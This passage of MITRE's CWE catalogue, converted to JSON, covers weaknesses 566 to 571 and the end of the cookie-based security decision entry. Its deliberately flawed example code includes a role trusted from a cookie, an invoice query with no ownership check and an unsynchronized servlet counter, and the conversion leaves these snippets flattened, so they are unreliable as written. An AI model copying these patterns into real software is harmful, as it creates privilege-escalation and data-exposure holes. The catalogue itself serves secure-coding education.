ways.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"642","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"602","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"It is dangerous to use cookies to set a user\'s privileges. The cookie can be manipulated to escalate an attacker\'s privileges to an administrative level."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Avoid using cookie data for a security-related decision."},{"Phase":"Implementation","Description":"Perform thorough input validation (i.e.: server side validation) on the cookie data if you\'re going to use it for a security related decision."},{"Phase":"Architecture and Design","Description":"Add integrity checks to detect tampering."},{"Phase":"Architecture and Design","Description":"Protect critical cookies from replay attacks, since cross-site scripting or other attacks may allow attackers to steal a strongly-encrypted cookie that also passes integrity checks. This mitigation applies to cookies that should only be valid during a single transaction or session. By enforcing timeouts, you may limit the scope of an attack. As part of your integrity check, use an unpredictable, server-side value that is not exposed to the client."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-61"},"Intro_Text":"The following code excerpt reads a value from a browser cookie to determine the role of the user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie[] cookies = request.getCookies();for (int i =0; i< cookies.length; i++) {}","xhtml:br":"","xhtml:div":{"#text":"Cookie c = cookies[i];if (c.getName().equals(\\"role\\")) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"userRole = c.getValue();","attr":{"@_style":"margin-left:10px;"}}}}},"Body_Text":"It is easy for an attacker to modify the \\"role\\" value found in the locally stored cookie, allowing privilege escalation."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP29","Entry_Name":"Faulty endpoint authentication"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"226"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"39"}}]},"Notes":{"Note":{"#text":"This problem can be primary to many types of weaknesses in web applications. A developer may perform proper validation against URL parameters while assuming that attackers cannot modify cookies. As a result, the program might skip basic input validation to enable cross-site scripting, SQL injection, price tampering, and other attacks..","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-16","Modification_Importance":"Critical","Modification_Comment":"Clarified name and description; broadened the definition to include any security-critical operation, not just security decisions, to allow for relationships with injection weaknesses."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Name, Potential_Mitigations, Relationship_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Use of Cookies","attr":{"@_Date":"2008-04-11"}},{"#text":"Use of Cookies in Security Decision","attr":{"@_Date":"2009-07-27"}}]}},"566":{"attr":{"@_ID":"566","@_Name":"Authorization Bypass Through User-Controlled SQL Primary Key","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a database table that includes records that should not be accessible to an actor, but it executes a SQL statement with a primary key that can be controlled by that actor.","Extended_Description":{"xhtml:p":["When a user can set a primary key to any value, then the user can modify the key to point to unauthorized records.","Database access control errors occur when:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Data enters a program from an untrusted source.","The data is used to specify the value of a primary key in a SQL query.","The untrusted source does not have the permissions to be able to access all rows in the associated table."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"639","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Technology":{"attr":{"@_Name":"Database Server","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Read Application Data","Modify Application Data","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Assume all input is malicious. Use a standard input validation mechanism to validate all input for length, type, syntax, and business rules before accepting the data. Use an \\"accept known good\\" validation strategy."},{"Phase":"Implementation","Description":"Use a parameterized query AND make sure that the accepted values conform to the business rules. Construct your SQL statement accordingly."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code uses a parameterized statement, which escapes metacharacters and prevents SQL injection vulnerabilities, to construct and execute a SQL query that searches for an invoice matching the specified identifier [1]. The identifier is selected from a list of all invoices associated with the current authenticated user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"...conn = new SqlConnection(_ConnectionString);conn.Open();int16 id = System.Convert.ToInt16(invoiceID.Text);SqlCommand query = new SqlCommand( \\"SELECT * FROM invoices WHERE id = @id\\", conn);query.Parameters.AddWithValue(\\"@id\\", id);SqlDataReader objReader = objCommand.ExecuteReader();...","xhtml:br":["","","","","","",""]}},"Body_Text":"The problem is that the developer has not considered all of the possible values of id. Although the interface generates a list of invoice identifiers that belong to the current user, an attacker can bypass this interface to request any desired invoice. Because the code in this example does not check to ensure that the user has permission to access the requested invoice, it will display any invoice, even if it does not belong to the current user."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Access Control Bypass Through User-Controlled SQL Primary Key","attr":{"@_Date":"2011-03-29"}}}},"567":{"attr":{"@_ID":"567","@_Name":"Unsynchronized Access to Shared Data in a Multithreaded Context","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly synchronize shared data, such as static variables across threads, which can lead to undefined behavior and unpredictable data changes.","Extended_Description":{"xhtml:p":["Within servlets, shared static variables are not protected from concurrent access, but servlets are multithreaded. This is a typical programming mistake in J2EE applications, since the multithreading is handled by the framework. When a shared variable can be influenced by an attacker, one thread could wind up modifying the variable to contain data that is not valid for a different thread that is also using the data within the variable.","Note that this weakness is not unique to servlets."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"820","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"488","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Modify Application Data","DoS: Instability","DoS: Crash, Exit, or Restart"],"Note":"If the shared variable contains sensitive data, it may be manipulated or displayed in another user session. If this data is used to control the application, its value can be manipulated to cause the application to crash or perform poorly."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Remove the use of static variables used between servlets. If this cannot be avoided, use synchronized access for these variables."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code implements a basic counter for how many times the page has been accesed.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public static class Counter extends HttpServlet {}","xhtml:div":{"#text":"static int count = 0;protected void doGet(HttpServletRequest in, HttpServletResponse out)throws ServletException, IOException {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"out.setContentType(\\"text/plain\\");PrintWriter p = out.getWriter();count++;p.println(count + \\" hits so far!\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}}},"Body_Text":["Consider when two separate threads, Thread A and Thread B, concurrently handle two different requests:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Assume this is the first occurrence of doGet, so the value of count is 0."},{"xhtml:div":"doGet() is called within Thread A."},{"xhtml:div":"The execution of doGet() in Thread A continues to the point AFTER the value of the count variable is read, then incremented, but BEFORE it is saved back to count. At this stage, the incremented value is 1, but the value of count is 0."},{"xhtml:div":"doGet() is called within Thread B, and due to a higher thread priority, Thread B progresses to the point where the count variable is accessed (where it is still 0), incremented, and saved. After the save, count is 1."},{"xhtml:div":"Thread A continues. It saves the intermediate, incremented value to the count variable - but the incremented value is 1, so count is \\"re-saved\\" to 1."}]}},"At this point, both Thread A and Thread B print that one hit has been seen, even though two separate requests have been processed. The value of count should be 2, not 1.","While this example does not have any real serious implications, if the shared variable in question is used for resource tracking, then resource consumption could occur. Other scenarios exist."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA00-J","Entry_Name":"Ensure visibility when accessing shared primitive variables"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA02-J","Entry_Name":"Ensure that compound operations on shared variables are atomic"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"25"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-09","Modification_Importance":"Critical","Modification_Comment":"Made name and description more specific to match the essence of the rest of the entry."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Unsynchronized Access to Shared Data","attr":{"@_Date":"2010-12-13"}}}},"568":{"attr":{"@_ID":"568","@_Name":"finalize() Method Without super.finalize()","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains a finalize() method that does not call super.finalize().","Extended_Description":"The Java Language Specification states that it is a good practice for a finalize() method to call super.finalize().","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"459","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Call the super.finalize() method."},{"Phase":"Testing","Description":"Use static analysis tools to spot such issues in your code."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following method omits the call to super.finalize().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"protected void finalize() {}","xhtml:div":{"#text":"discardNative();","attr":{"@_style":"margin-left:10px;"}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET12-J","Entry_Name":"Do not use finalizers"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Erroneous Finalize Method","attr":{"@_Date":"2008-04-11"}}}},"570":{"attr":{"@_ID":"570","@_Name":"Expression is Always False","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains an expression that will always evaluate to false.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"561","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Use Static Analysis tools to spot such conditions."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following Java example the updateUserAccountOrder() method used within an e-business product ordering/inventory application will validate the product number that was ordered and the user account number. If they are valid, the method will update the product inventory, the user account, and the user order appropriately.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void updateUserAccountOrder(String productNumber, String accountNumber) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"boolean isValidProduct = false;boolean isValidAccount = false;if (validProductNumber(productNumber)) {}else {}if (validAccountNumber(accountNumber)) {}if (isValidProduct && isValidAccount) {}","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"isValidProduct = true;updateInventory(productNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"return;","attr":{"@_style":"margin-left:10px;"}},{"#text":"isValidProduct = true;updateAccount(accountNumber, productNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"updateAccountOrder(accountNumber, productNumber);","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"...if (validAccountNumber(accountNumber)) {}...","xhtml:br":["",""],"xhtml:div":{"#text":"isValidAccount = true;updateAccount(accountNumber, productNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}],"Body_Text":["However, the method never sets the isValidAccount variable after initializing it to false so the isValidProduct is mistakenly used twice. The result is that the expression \\"isValidProduct && isValidAccount\\" will always evaluate to false, so the updateAccountOrder() method will never be invoked. This will create serious problems with the product ordering application since the user account and inventory databases will be updated but the order will not be updated.","This can be easily corrected by updating the appropriate variable."]},{"Intro_Text":"In the following example, the hasReadWriteAccess method uses bit masks and bit operators to determine if a user has read and write privileges for a particular process. The variable mask is defined as a bit mask from the BIT_READ and BIT_WRITE constants that have been defined. The variable mask is used within the predicate of the hasReadWriteAccess method to determine if the userMask input parameter has the read and write bits set.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define BIT_READ 0x0001 // 00000001#define BIT_WRITE 0x0010 // 00010000unsigned int mask = BIT_READ & BIT_WRITE; /* intended to use \\"|\\" */// using \\"&\\", mask = 00000000// using \\"|\\", mask = 00010001// determine if user has read and write accessint hasReadWriteAccess(unsigned int userMask) {}","xhtml:br":["","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// if the userMask has read and write bits set// then return 1 (true)if (userMask & mask) {}// otherwise return 0 (false)return 0;","xhtml:br":["","","","",""],"xhtml:div":{"#text":"return 1;","attr":{"@_style":"margin-left:10px;"}}}}}},"Body_Text":["However the bit operator used to initialize the mask variable is the AND operator rather than the intended OR operator (CWE-480), this resulted in the variable mask being set to 0. As a result, the if statement will always evaluate to false and never get executed.","The use of bit masks, bit operators and bitwise operations on variables can be difficult. If possible, try to use frameworks or libraries that provide appropriate functionality and abstract the implementation."]},{"Intro_Text":"In the following example, the updateInventory method used within an e-business inventory application will update the inventory for a particular product. This method includes an if statement with an expression that will always evaluate to false. This is a common practice in C/C++ to introduce debugging statements quickly by simply changing the expression to evaluate to true and then removing those debugging statements by changing expression to evaluate to false. This is also a common practice for disabling features no longer needed.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int updateInventory(char* productNumber, int numberOfItems) {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int initCount = getProductCount(productNumber);int updatedCount = initCount + numberOfItems;int updated = updateProductCount(updatedCount);// if statement for debugging purposes onlyif (1 == 0) {}return updated;","xhtml:br":["","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char productName[128];productName = getProductName(productNumber);printf(\\"product %s initially has %d items in inventory \\\\n\\", productName, initCount);printf(\\"adding %d items to inventory for %s \\\\n\\", numberOfItems, productName);if (updated == 0) {}else {}","xhtml:br":["","","","","","","","","",""],"xhtml:div":[{"#text":"printf(\\"Inventory updated for product %s to %d items \\\\n\\", productName, updatedCount);","attr":{"@_style":"margin-left:10px;"}},{"#text":"printf(\\"Inventory not updated for product: %s \\\\n\\", productName);","attr":{"@_style":"margin-left:10px;"}}]}}}}}},"Body_Text":"Using this practice for introducing debugging statements or disabling features creates dead code that can cause problems during code maintenance and potentially introduce vulnerabilities. To avoid using expressions that evaluate to false for debugging purposes a logging API or debugging API should be used for the output of debugging messages."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC00-C","Entry_Name":"Compile cleanly at high warning levels"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"571":{"attr":{"@_ID":"571","@_Name":"Expression is Always True","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains an expression that will always evaluate to true.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"561","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Use Static Analysis tools to spot such conditions."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example the updateInventory() method used within an e-business product ordering/inventory application will check if the input product number is in the store or in the warehouse. If the product is found, the method will update the store or warehouse database as well as the aggregate product database. If the product is not found, the method intends to do some special processing without updating any database.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void updateInventory(String productNumber) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"boolean isProductAvailable = false;boolean isDelayed = false;if (productInStore(productNumber)) {}else if (productInWarehouse(productNumber)) {}else {}if ( isProductAvailable ) {}else if ( isDelayed ) {}","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"isProductAvailable = true;updateInStoreDatabase(productNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"isProductAvailable = true;updateInWarehouseDatabase(productNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"isProductAvailable = true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"updateProductDatabase(productNumber);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"/* Warn customer about delay before order processing */"}}]}}}},"Body_Text":"However, the method never sets the isDelayed variable and instead will always update the isProductAvailable variable to true. The result is that the predicate testing the isProductAvailable boolean will always evaluate to true and therefore always update the product database. Further, since the isDelayed variable is initialized to false and never changed, the expression always evaluates to false and the customer will never be warned of a delay on their product."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC00-C","Entry_Name":"Compile cleanly at high warning levels"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric 